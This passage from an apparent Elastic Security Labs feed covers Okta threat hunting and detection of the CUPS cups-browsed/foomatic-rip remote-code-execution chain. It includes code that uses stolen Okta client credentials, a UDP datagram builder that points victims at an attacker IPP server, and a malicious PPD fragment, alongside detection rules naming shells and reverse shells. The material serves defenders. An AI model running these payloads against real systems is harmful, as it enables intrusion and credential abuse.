<img src="https://www.elastic.co/es/security-labs/assets/images/elevate-your-threat-hunting/image5.png" alt="" /></p>
<p><strong>Run Query</strong> - Run query of choice against a particular stack to identify hits (requires pre-auth). Generates a search link for easy pivot.
<img src="https://www.elastic.co/es/security-labs/assets/images/elevate-your-threat-hunting/image8.png" alt="" /></p>
<p><strong>View Hunt</strong> - View a hunting file in TOML or JSON format.
<img src="https://www.elastic.co/es/security-labs/assets/images/elevate-your-threat-hunting/image7.png" alt="" /></p>
<p><strong>Hunt Summary</strong> - Generate count statistics broken down by integration, platform, or language.
<img src="https://www.elastic.co/es/security-labs/assets/images/elevate-your-threat-hunting/image2.png" alt="" /></p>
<h2>Benefits of these Hunt Queries</h2>
<p>Each hunting query will be saved in its respective TOML file for programmatic use, but also have a replicated markdown file that serves as a quick reference for manual tasks or review. We understand that while automation is crucial to hunting maturity, often hunters may want a quick and easy copy-paste job to reveal events of interest. Our collection of hunt queries and CLI options offers several advantages to both novice and experienced threat hunters. Each query in the library is designed to serve as a powerful tool for detecting hidden threats, as well as offering additional layers of investigation during incident response.</p>
<ul>
<li>Programmatic and Manual Flexibility: Each query is structured in a standardized TOML format for programmatic use, but also offers a Markdown version for those who prefer manual interaction.</li>
<li>Scalable queries: Our hunt queries are designed with scalability in mind, leveraging the power of Elastic’s versatile and latest query languages such as ES|QL. This scalability ensures that you can continuously adapt your hunting efforts as your organization’s infrastructure grows, maintaining high levels of visibility and security.</li>
<li>Integration with Elastic’s Products: These queries integrate with the Elastic Stack, and our automation enables quick testing so you can pivot through Elastic’s Security UI for deeper analysis.</li>
<li>Diverse Query Types Available: Our hunt queries support a wide variety of query languages, including KQL, EQL, ES|QL, OsQuery, and YARA, making them adaptable across different data sources and environments. Whether hunting across endpoints, cloud environments, or specific integrations like Okta or LLMs, users can leverage the right language for their unique needs.</li>
<li>Extended Coverage for Elastic Prebuilt Rules: While Elastic’s prebuilt detection rules offer robust coverage, there are always scenarios where vendor detection logic may not fully meet operational needs due to the specific environment or nature of the threat. These hunting queries help fill those gaps by offering broader and more nuanced coverage, particularly for behaviors that don’t neatly fit into rule-based detections.</li>
<li>Stepping Stone for Hunt Initialization or Pivoting: These queries serve as an initial approach to kickstart investigations or pivot from initial findings. Whether used proactively to identify potential threats or reactively to expand upon triggered alerts, they provide additional context and insight based on the threat hunter’s hypotheses and workflows.</li>
<li>MITRE ATT&amp;CK Alignment: Every hunt query includes MITRE ATT&amp;CK mappings to provide contextual insight and help prioritize the investigation of threats according to threat behaviors.</li>
<li>Community and Maintenance: This hunting module lives within the broader Elastic Detection Rules repository, ensuring continual updates alongside our prebuilt rules. Community contributions also enable our users to collaborate and expand unique ways to hunt.</li>
</ul>
<p>As we understand the fast-paced nature of hunting and the need for automation, we have included search capabilities and a run option to quickly identify whether any hunting queries in this library return matching results.</p>
<h2>Details of Each Hunting Analytic</h2>
<p>Each hunting search query in our repository includes the following details to maximize its effectiveness and ease of use:</p>
<ul>
<li><strong>Data Source or Integration</strong>: The origin of the data utilized in the hunt.</li>
<li><strong>Name</strong>: A descriptive title for the hunting query.</li>
<li><strong>Hypothesis</strong>: The underlying assumption or threat scenario the hunt aims to investigate. This is represented as the description.</li>
<li><strong>Query(s)</strong>: Provided in one of several formats, including ES|QL, EQL, KQL, or OsQuery.</li>
<li><strong>Notes</strong>: Additional information on how to pivot within the data, key indicators to watch for, and other valuable insights.</li>
<li><strong>References</strong>: Links to relevant resources and documentation that support the hunt.</li>
<li><strong>Mapping to MITRE ATT&amp;CK</strong>: How the hunt correlates to known tactics, techniques, and procedures in the MITRE ATT&amp;CK framework.</li>
</ul>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/elevate-your-threat-hunting/image9.png" alt="" /></p>
<p>For those who prefer a more hands-on approach, we also provide TOML files for programmatic consumption. Additionally, we offer an easy converter to Markdown for users who prefer to manually copy and paste the hunts into their systems.</p>
<h3>Hunting Query Creation Example:</h3>
<p>In the following example, we will explore a basic hunting cycle for the purpose of creating a new hunting query that we want to use in later hunting cycles. Note that this is an oversimplified hunting cycle that may require several more steps in a real-world application.</p>
<p><strong>Hypothesis</strong>: We assume that a threat adversary (TA) is targeting identity providers (IdPs), specifically Okta, by compromising cloud accounts and identifying runtime instances in CI/CD pipelines that use client credentials to authenticate with Okta’s API. Their goal is to find unsecured credentials, steal them, and obtain an access token whose assumed permissions are tied to an Okta administrator.</p>
<p><strong>Evidence</strong>: We suspect that, to find evidence of this, we need Okta system logs that report API activity: specifically, any public client app sending access token requests where the grant type is client credentials. Because the TA is unaware of the OAuth scopes mapped to the application, we also suspect the access token request may fail when incorrect scopes are explicitly sent. Finally, we know that demonstrating proof-of-possession (DPoP) is not required for our client applications during the authentication workflow, because requiring it would disrupt operations; we prioritize operability over security.</p>
<p>Below is the Python code used to emulate the behavior of attempting to get an access token with stolen client credentials, where the scope is <code>okta.trustedOrigins.manage</code>, so the actor can add a new cross-origin resource sharing (CORS) policy and route client authentication through their own server.</p>
<pre><code>import base64
import requests

okta_domain = &quot;TARGET_DOMAIN&quot;
client_id = &quot;STOLEN_CLIENT_ID&quot;
client_secret = &quot;STOLEN_CLIENT_CREDENTIALS&quot;

# Prepare the request; HTTP Basic auth requires base64(client_id:client_secret)
basic_auth = base64.b64encode(f&quot;{client_id}:{client_secret}&quot;.encode()).decode()
auth_url = f&quot;{okta_domain}/oauth2/default/v1/token&quot;
auth_data = {
    &quot;grant_type&quot;: &quot;client_credentials&quot;,
    &quot;scope&quot;: &quot;okta.trustedOrigins.manage&quot;
}
auth_headers = {
    &quot;Accept&quot;: &quot;application/json&quot;,
    &quot;Content-Type&quot;: &quot;application/x-www-form-urlencoded&quot;,
    &quot;Authorization&quot;: f&quot;Basic {basic_auth}&quot;
}

# Make the request
response = requests.post(auth_url, headers=auth_headers, data=auth_data)

# Handle the response
if response.ok:
    token = response.json().get(&quot;access_token&quot;)
    print(f&quot;Token: {token}&quot;)
else:
    print(f&quot;Error: {response.text}&quot;)
</code></pre>
<p>Following this behavior, we formulate a query as such for hunting where we filter out some known client applications like DataDog and Elastic’s Okta integrations.</p>
<pre><code>from logs-okta.system*
| where @timestamp &gt; NOW() - 7 day
| where
    event.dataset == &quot;okta.system&quot;

    // filter on failed access token grant requests where source is a public client app
    and event.action == &quot;app.oauth2.as.token.grant&quot;
    and okta.actor.type == &quot;PublicClientApp&quot;
    and okta.outcome.result == &quot;FAILURE&quot;

    // filter out known Elastic and Datadog actors
    and not (
        okta.actor.display_name LIKE &quot;Elastic%&quot;
        or okta.actor.display_name LIKE &quot;Datadog%&quot;
    )

    // filter for scopes that are not implicitly granted
    and okta.outcome.reason == &quot;no_matching_scope&quot;
</code></pre>
<p>As shown below, we identify matching results and begin to pivot and dive deeper into this investigation, eventually involving incident response (IR) and escalating appropriately.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/elevate-your-threat-hunting/image10.png" alt="" /></p>
<p>During our after-action report (AAR), we take note of the query that helped identify these compromised credentials and decide to preserve it as a hunting query in our forked Detection Rules repository. Given its fidelity, and the constant development work we do on custom applications that interact with the Okta APIs, it doesn’t quite make sense to create a detection rule, so we reserve it as a hunting query instead.</p>
<p>Creating a new hunting query TOML file in the <code>hunting/okta/queries</code> package, we add the following information:</p>
<pre><code>author = &quot;EvilC0rp Defenders&quot;
description = &quot;&quot;&quot;Long Description of Hunt Intentions&quot;&quot;&quot;
integration = [&quot;okta&quot;]
uuid = &quot;0b936024-71d9-11ef-a9be-f661ea17fbcc&quot;
name = &quot;Failed OAuth Access Token Retrieval via Public Client App&quot;
language = [&quot;ES|QL&quot;]
license = &quot;Apache License 2.0&quot;
notes = [Array of useful notes from our investigation]
mitre = ['T1550.001']
query = [Our query as shown above]
</code></pre>
<p>With the file saved we run <code>python -m hunting generate-markdown FILEPATH</code> to generate the markdown version of it in <code>hunting/okta/docs/</code>.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/elevate-your-threat-hunting/image1.png" alt="" /></p>
<p>Once saved, we can view our new hunting content by using the <code>view-rule</code> command or search for it by running the <code>search</code> command, specifying Okta as the data source and <a href="https://attack.mitre.org/techniques/T1550/001/">T1550.001</a> as the subtechnique we are looking for.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/elevate-your-threat-hunting/image7.png" alt="" /></p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/elevate-your-threat-hunting/image5.png" alt="" /></p>
<p>Last but not least, we can check that the query runs successfully by using the <code>run-query</code> command, as long as we save a <code>.detection-rules-cfg.yaml</code> file with our Elasticsearch authentication details; this tells us whether we have matching results.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/elevate-your-threat-hunting/image8.png" alt="" /></p>
<p>Now we can refresh our hunting indexes with the <code>refresh-index</code> command and ensure that our markdown file has been created.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/elevate-your-threat-hunting/image11.png" alt="" /></p>
<h2>How We Plan to Expand</h2>
<p>Our aim is to continually enhance the Hunting package with additional queries, covering an even wider array of threat scenarios. We will update this resource based on:</p>
<ul>
<li><strong>Emerging Threats</strong>: Developing new queries as new types of cyber threats arise.</li>
<li><strong>Community Feedback</strong>: Incorporating suggestions and improvements proposed by our community.</li>
<li><strong>Filling Gaps Where Traditional Alerting Fails</strong>: While we understand the power of our advanced SIEM and EDR, we also understand that some situations favor hunting instead.</li>
<li><strong>Longevity and Maintenance</strong>: Our hunting package lives within the very same repository we actively manage our out-of-the-box (OOTB) prebuilt detection rules for the Elastic SIEM. As a result, we plan to routinely add and update our hunting resources.</li>
<li><strong>New Features</strong>: Developing new features and commands to aid users in managing their hunting efforts within the repository.</li>
</ul>
<p>Our expansion would not be complete without sharing with the rest of the community in an effort to provide value wherever possible. Community adoption of these resources, and of the paradigms surrounding these threat scenarios, is an important part of our team’s effort to support hunting.</p>
<p>Lastly, we acknowledge and applaud the hunting efforts completed or in progress by our industry peers and community. We also acknowledge that maintaining such a package of hunting analytics and queries requires consistency and careful planning. Thus, this package will receive continued support, with additional hunting queries added over time, often aligning with our detection research efforts or community submissions!</p>
<h2>Get Involved</h2>
<p>Explore the Hunting resources, utilize the queries and python package, participate in our community discussion forums to share your experiences and contribute to the evolution of this resource. Your feedback is crucial for us to refine and expand our offerings.</p>
<ul>
<li><a href="https://elasticstack.slack.com/archives/C016E72DWDS">Detection Rules Community Slack Channel</a></li>
<li>Hunting “<a href="https://github.com/elastic/detection-rules/tree/main/hunting">Getting Started</a>” Doc</li>
<li><a href="https://twitter.com/elasticseclabs">Elastic Security Labs</a> on X</li>
</ul>
<h2>Conclusion</h2>
<p>With the expansion of these hunting resources, Elastic reaffirms its commitment to advancing cybersecurity defenses. This resource is designed for both experienced threat hunters and those new to the field, providing the tools needed to detect and mitigate sophisticated cyber threats effectively.</p>
<p>Stay tuned for more updates, and happy hunting!</p>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/es/security-labs/assets/images/elevate-your-threat-hunting/elevate-your-threat-hunting.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Cups Overflow: When your printer spills more than Ink]]></title>
            <link>https://www.elastic.co/es/security-labs/cups-overflow</link>
            <guid>cups-overflow</guid>
            <pubDate>Sat, 28 Sep 2024 00:00:00 GMT</pubDate>
            <description><![CDATA[Elastic Security Labs discusses detection and mitigation strategies for vulnerabilities in the CUPS printing system, which allow unauthenticated attackers to exploit the system via IPP and mDNS, resulting in remote code execution (RCE) on UNIX-based systems such as Linux, macOS, BSDs, ChromeOS, and Solaris.]]></description>
            <content:encoded><![CDATA[<h2>Update October 2, 2024</h2>
<p>The following packages introduced out-of-the-box (OOTB) rules to detect the exploitation of these vulnerabilities. Please check your &quot;Prebuilt Security Detection Rules&quot; integration versions or visit the <a href="https://www.elastic.co/es/guide/en/security/current/prebuilt-rules-downloadable-updates.html">Downloadable rule updates</a> site.</p>
<ul>
<li>Stack Version 8.15 - Package Version 8.15.6+</li>
<li>Stack Version 8.14 - Package Version 8.14.12+</li>
<li>Stack Version 8.13 - Package Version 8.13.18+</li>
<li>Stack Version 8.12 - Package Version 8.12.23+</li>
</ul>
<h2>Key takeaways</h2>
<ul>
<li>On September 26, 2024, security researcher Simone Margaritelli (@evilsocket) disclosed multiple vulnerabilities affecting the <code>cups-browsed</code>, <code>libcupsfilters</code>, and <code>libppd</code> components of the CUPS printing system, impacting versions &lt;= 2.0.1.</li>
<li>The vulnerabilities allow an unauthenticated remote attacker to exploit the printing system via IPP (Internet Printing Protocol) and mDNS to achieve remote code execution (RCE) on affected systems.</li>
<li>The attack can be initiated over the public internet or a local network, targeting UDP port 631 exposed by <code>cups-browsed</code>, with no authentication required.</li>
<li>The vulnerability chain includes the <code>foomatic-rip</code> filter, which permits the execution of arbitrary commands through the <code>FoomaticRIPCommandLine</code> directive, a known (<a href="https://nvd.nist.gov/vuln/detail/CVE-2011-2697">CVE-2011-2697</a>, <a href="https://nvd.nist.gov/vuln/detail/CVE-2011-2964">CVE-2011-2964</a>) but unpatched issue since 2011.</li>
<li>Systems affected include most GNU/Linux distributions, BSDs, ChromeOS, and Solaris, many of which have the <code>cups-browsed</code> service enabled by default.</li>
<li>Based on the title of the publication, “Attacking UNIX Systems via CUPS, Part I,” Margaritelli likely plans to publish further research on this topic.</li>
<li>Elastic has provided protections and guidance to help organizations detect and mitigate potential exploitation of these vulnerabilities.</li>
</ul>
<h2>The CUPS RCE at a glance</h2>
<p>On September 26, 2024, security researcher Simone Margaritelli (@evilsocket) <a href="https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/">uncovered</a> a chain of critical vulnerabilities in the CUPS (Common Unix Printing System) utilities, specifically in components like <code>cups-browsed</code>, <code>libcupsfilters</code>, and <code>libppd</code>. These vulnerabilities — identified as <a href="https://www.cve.org/CVERecord?id=CVE-2024-47176">CVE-2024-47176</a>, <a href="https://www.cve.org/CVERecord?id=CVE-2024-47076">CVE-2024-47076</a>, <a href="https://www.cve.org/CVERecord?id=CVE-2024-47175">CVE-2024-47175</a>, and <a href="https://www.cve.org/CVERecord?id=CVE-2024-47177">CVE-2024-47177</a> — affect widely adopted UNIX systems such as GNU/Linux, BSDs, ChromeOS, and Solaris, exposing them to remote code execution (RCE).</p>
<p>At the core of the issue is the lack of input validation in the CUPS components, which allows attackers to exploit the Internet Printing Protocol (IPP). Attackers can send malicious packets to the target's UDP port <code>631</code> over the Internet (WAN) or spoof DNS-SD/mDNS advertisements within a local network (LAN), forcing the vulnerable system to connect to a malicious IPP server.</p>
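<p>The WAN vector is strikingly simple: per the disclosure, <code>cups-browsed</code> accepts legacy CUPS browsing datagrams on UDP port <code>631</code> of roughly the form <code>&lt;type&gt; &lt;state&gt; &lt;uri&gt;</code>. The stdlib sketch below builds such a datagram for lab testing only; the field values mirror public PoCs and are illustrative, not authoritative:</p>

```python
import socket


def build_browse_packet(uri: str) -> bytes:
    """Build a legacy CUPS browsing datagram of the rough form
    '<type> <state> <uri>'; the type/state values (0, 3) mirror
    public PoCs and are illustrative."""
    return f"0 3 {uri}".encode()


def send_probe(target: str, uri: str, port: int = 631) -> None:
    # Fire-and-forget UDP datagram at cups-browsed's default port.
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.sendto(build_browse_packet(uri), (target, port))


# Only ever point this at a lab host you own, e.g.:
# send_probe("198.51.100.20", "http://192.0.2.10:8631/printers/fake")
```

<p>A vulnerable <code>cups-browsed</code> that receives this datagram will reach back to the advertised URI to fetch printer attributes, which is what hands the attacker control of the generated PPD.</p>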
<p>For context, IPP is an application-layer protocol used to send and receive print jobs over the network. These communications include information about the state of the printer (paper jams, low ink, etc.) and the state of any jobs. IPP is supported across all major operating systems, including Windows, macOS, and Linux. When a printer becomes available, it broadcasts (via DNS-SD/mDNS) a message stating that it is ready, including its Uniform Resource Identifier (URI). Many default Linux configurations will automatically add and register the printer for use within the OS upon receiving this message. As such, the malicious printer in this case will be automatically registered and made available for print jobs.</p>
<p>Upon connecting, the malicious server returns crafted IPP attributes that are injected into PostScript Printer Description (PPD) files, which are used by CUPS to describe printer properties. These manipulated PPD files enable the attacker to execute arbitrary commands when a print job is triggered.</p>
<p>One of the major vulnerabilities in this chain is the <code>foomatic-rip</code> filter, which has been known to allow arbitrary command execution through the FoomaticRIPCommandLine directive. Despite being vulnerable for over a decade, it remains unpatched in many modern CUPS implementations, further exacerbating the risk.</p>
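<p>For illustration, an injected PPD fragment abusing this directive might look roughly like the following. This is a hypothetical sketch modeled on public write-ups; the command string is a harmless placeholder:</p>

```
*PPD-Adobe: "4.3"
*% Attacker-controlled attributes injected into the generated PPD
*FoomaticRIPCommandLine: "echo pwned > /tmp/poc"
*cupsFilter2: "application/vnd.cups-postscript application/vnd.cups-postscript 0 foomatic-rip"
```

<p>When a print job is routed through <code>foomatic-rip</code>, the quoted command line is executed on the host.</p>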
<blockquote>
<p>While these vulnerabilities are highly critical with a CVSS score as high as 9.9, they can be mitigated by disabling cups-browsed, blocking UDP port 631, and updating CUPS to a patched version. Many UNIX systems have this service enabled by default, making this an urgent issue for affected organizations to address.</p>
</blockquote>
<h2>Elastic’s POC analysis</h2>
<p>Elastic’s Threat Research Engineers initially located the original proof-of-concept written by @evilsocket, which had been leaked. However, we chose to utilize the <a href="https://github.com/RickdeJager/cupshax/blob/main/cupshax.py">cupshax</a> proof of concept (PoC) based on its ability to execute locally.</p>
<p>To start, the PoC made use of a custom Python class that was responsible for creating and registering the fake printer service on the network using mDNS/ZeroConf. This is mainly achieved by creating a ZeroConf service entry for the fake Internet Printing Protocol (IPP) printer.</p>
<p>Upon execution, the PoC broadcasts a fake printer advertisement and listens for IPP requests. When a vulnerable system sees the broadcast, the victim automatically requests the printer's attributes from a URL provided in the broadcast message. The PoC responds with IPP attributes including the FoomaticRIPCommandLine parameter, which is known for its history of CVEs. The victim generates and saves a <a href="https://en.wikipedia.org/wiki/PostScript_Printer_Description">PostScript Printer Description</a> (PPD) file from these IPP attributes.</p>
<p>At this point, continued execution requires user interaction to start a print job and choose to send it to the fake printer. Once a print job is sent, the PPD file tells CUPS how to handle the print job. The included FoomaticRIPCommandLine directive allows the arbitrary command execution on the victim machine.</p>
<p>During our review and testing of the exploits with the Cupshax PoC, we identified several notable hurdles and key details about the vulnerable endpoints and their execution processes.</p>
<p>When running arbitrary commands to create files, we noticed that <code>lp</code> is the user and group reported for arbitrary command execution, the <a href="https://wiki.debian.org/SystemGroups#:~:text=lp%20(LP)%3A%20Members%20of,jobs%20sent%20by%20other%20users.">default printing group</a> on Linux systems that use CUPS utilities. Thus, the Cupshax PoC/exploit requires both the CUPS vulnerabilities and the <code>lp</code> user to have sufficient permissions to retrieve and run a malicious payload. By default, the <code>lp</code> user on many systems will have these permissions to run effective payloads such as reverse shells; however, an alternative mitigation is to restrict <code>lp</code> such that these payloads are ineffective through native controls available within Linux such as AppArmor or SELinux policies, alongside firewall or IPtables enforcement policies.</p>
<p>The <code>lp</code> user in many default configurations has access to commands that are not required for the print service, for instance <code>telnet</code>. To reduce the attack surface, we recommend removing unnecessary services and adding restrictions to them where needed to prevent the <code>lp</code> user from using them.</p>
<p>We also noted that interactive reverse shells are not immediately supported through this technique, since the <code>lp</code> user does not have a login shell; however, with some creative tactics, we were still able to accomplish this with the PoC. Typical PoCs test the exploit by writing a file to <code>/tmp/</code>, which is trivial to detect in most cases. Note that the user writing this file will be <code>lp</code>, so similar behavior will be present for attackers downloading and saving a payload on disk.</p>
<p>Alongside these observations, the parent process, <code>foomatic-rip</code>, was observed in our telemetry executing a shell, which is highly uncommon.</p>
<h2>Executing the ‘Cupshax’ POC</h2>
<p>To demonstrate the impact of these vulnerabilities, we attempted two different scenarios: invoking a reverse shell using living-off-the-land techniques, and retrieving and executing a remote payload. Adversarial groups commonly attempt these actions once a vulnerable system is identified. While exploitation of these vulnerabilities is in its infancy and widespread activity has not been observed, future attacks will likely replicate some of the scenarios depicted below.</p>
<p>Our first attempts running the Cupshax PoC were met with a number of minor roadblocks due to the default user groups assigned to the <code>lp</code> user — namely restrictions around interactive logon, an attribute common to users that require remote access to systems. This did not, however, impact our ability to download a remote payload, compile, and execute on the impacted host system:</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/cups-overflow/video1.gif" alt="A remotely downloaded payload, compiled and executed on a vulnerable host" title="A remotely downloaded payload, compiled and executed on a vulnerable host" /></p>
<p>Continued testing was performed around reverse shell invocation, successfully demonstrated below:</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/cups-overflow/video2.gif" alt="A reverse shell executed on a vulnerable host" title="A reverse shell executed on a vulnerable host" /></p>
<h2>Assessing impact</h2>
<ul>
<li><strong>Severity:</strong> These vulnerabilities are given CVSS scores <a href="https://x.com/evilsocket/status/1838220677389656127">controversially</a> up to 9.9, indicating a critical severity. The widespread use of CUPS and the ability to remotely exploit these vulnerabilities make this a high-risk issue.</li>
<li><strong>Who is affected?:</strong> The vulnerability affects most UNIX-based systems, including major GNU/Linux distributions and other operating systems like ChromeOS and BSDs running the impacted CUPS components. Public-facing or network-exposed systems are particularly at risk. Further guidance and notifications, alongside additional remediation steps, will likely be provided by vendors as patches become available. Even though CUPS usually listens on localhost, a Shodan report <a href="https://x.com/shodanhq/status/1839418045757845925">highlights</a> that over 75,000 CUPS services are exposed on the internet.</li>
<li><strong>Potential Damage:</strong> Once exploited, attackers can gain control over the system to run arbitrary commands. Depending on the environment, this can lead to data exfiltration, ransomware installation, or other malicious actions. Systems connected to printers over WAN are especially at risk since attackers can exploit this without needing internal network access.</li>
</ul>
<h2>Remediations</h2>
<p>As <a href="https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/#Remediation">highlighted</a> by @evilsocket, there are several remediation recommendations.</p>
<ul>
<li>Disable and uninstall the <code>cups-browsed</code> service. For example, see the recommendations from <a href="https://www.redhat.com/en/blog/red-hat-response-openprinting-cups-vulnerabilities">Red Hat</a> and <a href="https://ubuntu.com/blog/cups-remote-code-execution-vulnerability-fix-available">Ubuntu</a>.</li>
<li>Ensure your CUPS packages are updated to the latest versions available for your distribution.</li>
<li>If updating isn’t possible, block UDP port <code>631</code> and DNS-SD traffic from potentially impacted hosts, and investigate the aforementioned recommendations to further harden the <code>lp</code> user and group configuration on the host.</li>
</ul>
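<p>On systemd-based distributions, the first and third recommendations can typically be applied with commands along these lines (exact unit names and firewall tooling vary by distribution):</p>

```shell
# Stop the discovery service and prevent it from starting again
sudo systemctl disable --now cups-browsed
sudo systemctl mask cups-browsed

# If patching is not yet possible, block legacy CUPS browsing traffic
sudo ufw deny 631/udp                                  # ufw-based hosts
# or: sudo iptables -A INPUT -p udp --dport 631 -j DROP
```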
<h2>Elastic protections</h2>
<p>In this section, we look into detection and hunting queries designed to uncover suspicious activity linked to the currently published vulnerabilities. By focusing on process behaviors and command execution patterns, these queries help identify potential exploitation attempts before they escalate into full-blown attacks.</p>
<h3>cupsd or foomatic-rip shell execution</h3>
<p>The first detection rule targets processes on Linux systems that are spawned by <code>foomatic-rip</code> and immediately launch a shell. This is effective because legitimate print jobs rarely require shell execution, making this behavior a strong indicator of malicious activity. Note: A shell may not always be an adversary’s goal if arbitrary command execution is possible.</p>
<pre><code>process where host.os.type == &quot;linux&quot; and event.type == &quot;start&quot; and
 event.action == &quot;exec&quot; and process.parent.name == &quot;foomatic-rip&quot; and
 process.name in (&quot;bash&quot;, &quot;dash&quot;, &quot;sh&quot;, &quot;tcsh&quot;, &quot;csh&quot;, &quot;zsh&quot;, &quot;ksh&quot;, &quot;fish&quot;) 
 and not process.command_line like (&quot;*/tmp/foomatic-*&quot;, &quot;*-sDEVICE=ps2write*&quot;)
</code></pre>
<p>This query managed to detect all 33 PoC attempts that we performed:</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/cups-overflow/image6.png" alt="" /></p>
<p><a href="https://github.com/elastic/detection-rules/blob/a3e89a7fabe90a6f9ce02b58d5a948db8d231ee5/rules/linux/execution_cupsd_foomatic_rip_shell_execution.toml">https://github.com/elastic/detection-rules/blob/a3e89a7fabe90a6f9ce02b58d5a948db8d231ee5/rules/linux/execution_cupsd_foomatic_rip_shell_execution.toml</a></p>
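<p>To make the rule's mechanics concrete, the following hypothetical Python sketch re-implements the same conditions for a single flattened event, using <code>fnmatch</code> to stand in for EQL's <code>like</code> wildcards (field names mirror ECS):</p>

```python
from fnmatch import fnmatch

SHELLS = {"bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish"}
EXCLUDED = ("*/tmp/foomatic-*", "*-sDEVICE=ps2write*")


def matches_rule(event: dict) -> bool:
    """Hypothetical re-implementation of the EQL rule above for a
    single flattened event dict with ECS-style keys."""
    return (
        event.get("host.os.type") == "linux"
        and event.get("event.type") == "start"
        and event.get("event.action") == "exec"
        and event.get("process.parent.name") == "foomatic-rip"
        and event.get("process.name") in SHELLS
        and not any(fnmatch(event.get("process.command_line", ""), p)
                    for p in EXCLUDED)
    )
```

<p>The two excluded patterns mirror the benign Ghostscript invocations that <code>foomatic-rip</code> performs during normal printing.</p>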
<h3>Printer user (lp) shell execution</h3>
<p>This detection rule assumes that the default printer user (<code>lp</code>) handles the printing processes. By specifying this user, we can narrow the scope while broadening the parent process list to include <code>cupsd</code>. Although there's currently no indication that RCE can be exploited through <code>cupsd</code>, we cannot rule out the possibility.</p>
<pre><code>process where host.os.type == &quot;linux&quot; and event.type == &quot;start&quot; and
 event.action == &quot;exec&quot; and user.name == &quot;lp&quot; and
 process.parent.name in (&quot;cupsd&quot;, &quot;foomatic-rip&quot;, &quot;bash&quot;, &quot;dash&quot;, &quot;sh&quot;, 
 &quot;tcsh&quot;, &quot;csh&quot;, &quot;zsh&quot;, &quot;ksh&quot;, &quot;fish&quot;) and process.name in (&quot;bash&quot;, &quot;dash&quot;, 
 &quot;sh&quot;, &quot;tcsh&quot;, &quot;csh&quot;, &quot;zsh&quot;, &quot;ksh&quot;, &quot;fish&quot;) and not process.command_line 
 like (&quot;*/tmp/foomatic-*&quot;, &quot;*-sDEVICE=ps2write*&quot;)
</code></pre>
<p>By focusing on the username <code>lp</code>, we broadened the scope and detected, like previously, all of the 33 PoC executions:</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/cups-overflow/image5.png" alt="" /></p>
<p><a href="https://github.com/elastic/detection-rules/blob/a3e89a7fabe90a6f9ce02b58d5a948db8d231ee5/rules/linux/execution_cupsd_foomatic_rip_lp_user_execution.toml">https://github.com/elastic/detection-rules/blob/a3e89a7fabe90a6f9ce02b58d5a948db8d231ee5/rules/linux/execution_cupsd_foomatic_rip_lp_user_execution.toml</a></p>
<h3>Network connection by CUPS foomatic-rip child</h3>
<p>This rule identifies network connections initiated by child processes of <code>foomatic-rip</code>, which is a behavior that raises suspicion. Since legitimate operations typically do not involve these processes establishing outbound connections, any detected activity should be closely examined. If such communications are expected in your environment, ensure that the destination IPs are properly excluded to avoid unnecessary alerts.</p>
<pre><code>sequence by host.id with maxspan=10s
  [process where host.os.type == &quot;linux&quot; and event.type == &quot;start&quot; 
   and event.action == &quot;exec&quot; and
   process.parent.name == &quot;foomatic-rip&quot; and
   process.name in (&quot;bash&quot;, &quot;dash&quot;, &quot;sh&quot;, &quot;tcsh&quot;, &quot;csh&quot;, &quot;zsh&quot;, &quot;ksh&quot;, &quot;fish&quot;)] 
   by process.entity_id
  [network where host.os.type == &quot;linux&quot; and event.type == &quot;start&quot; and 
   event.action == &quot;connection_attempted&quot;] by process.parent.entity_id
</code></pre>
<p>By capturing the parent/child relationship, we ensure the network connections originate from the potentially compromised application.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/cups-overflow/image7.png" alt="" /></p>
<p><a href="https://github.com/elastic/detection-rules/blob/a3e89a7fabe90a6f9ce02b58d5a948db8d231ee5/rules/linux/command_and_control_cupsd_foomatic_rip_netcon.toml">https://github.com/elastic/detection-rules/blob/a3e89a7fabe90a6f9ce02b58d5a948db8d231ee5/rules/linux/command_and_control_cupsd_foomatic_rip_netcon.toml</a></p>
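<p>The <code>sequence ... with maxspan=10s</code> construct joins the two events through entity IDs: the exec event's <code>process.entity_id</code> must match the network event's <code>process.parent.entity_id</code> within ten seconds. A hypothetical sketch of that correlation logic, with ECS-style field names:</p>

```python
from typing import Iterable

SHELLS = {"bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish"}
MAXSPAN = 10.0  # seconds, matching the rule's maxspan


def correlate(events: Iterable[dict]) -> list[tuple[dict, dict]]:
    """Pair a shell exec under foomatic-rip with a later connection
    attempt from that shell, joined on entity IDs within MAXSPAN."""
    hits, pending = [], {}
    for ev in sorted(events, key=lambda e: e["@timestamp"]):
        if (ev.get("event.category") == "process"
                and ev.get("process.parent.name") == "foomatic-rip"
                and ev.get("process.name") in SHELLS):
            pending[ev["process.entity_id"]] = ev
        elif ev.get("event.action") == "connection_attempted":
            first = pending.get(ev.get("process.parent.entity_id"))
            if first and ev["@timestamp"] - first["@timestamp"] <= MAXSPAN:
                hits.append((first, ev))
    return hits
```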
<h3>File creation by CUPS foomatic-rip child</h3>
<p>This rule detects suspicious file creation events initiated by child processes of <code>foomatic-rip</code>. As all current proofs of concept write a default test payload to a file in <code>/tmp/</code>, this rule would catch that behavior. Additionally, it can detect scenarios where an attacker downloads a malicious payload and subsequently creates a file.</p>
<pre><code>sequence by host.id with maxspan=10s
  [process where host.os.type == &quot;linux&quot; and event.type == &quot;start&quot; and 
   event.action == &quot;exec&quot; and process.parent.name == &quot;foomatic-rip&quot; and 
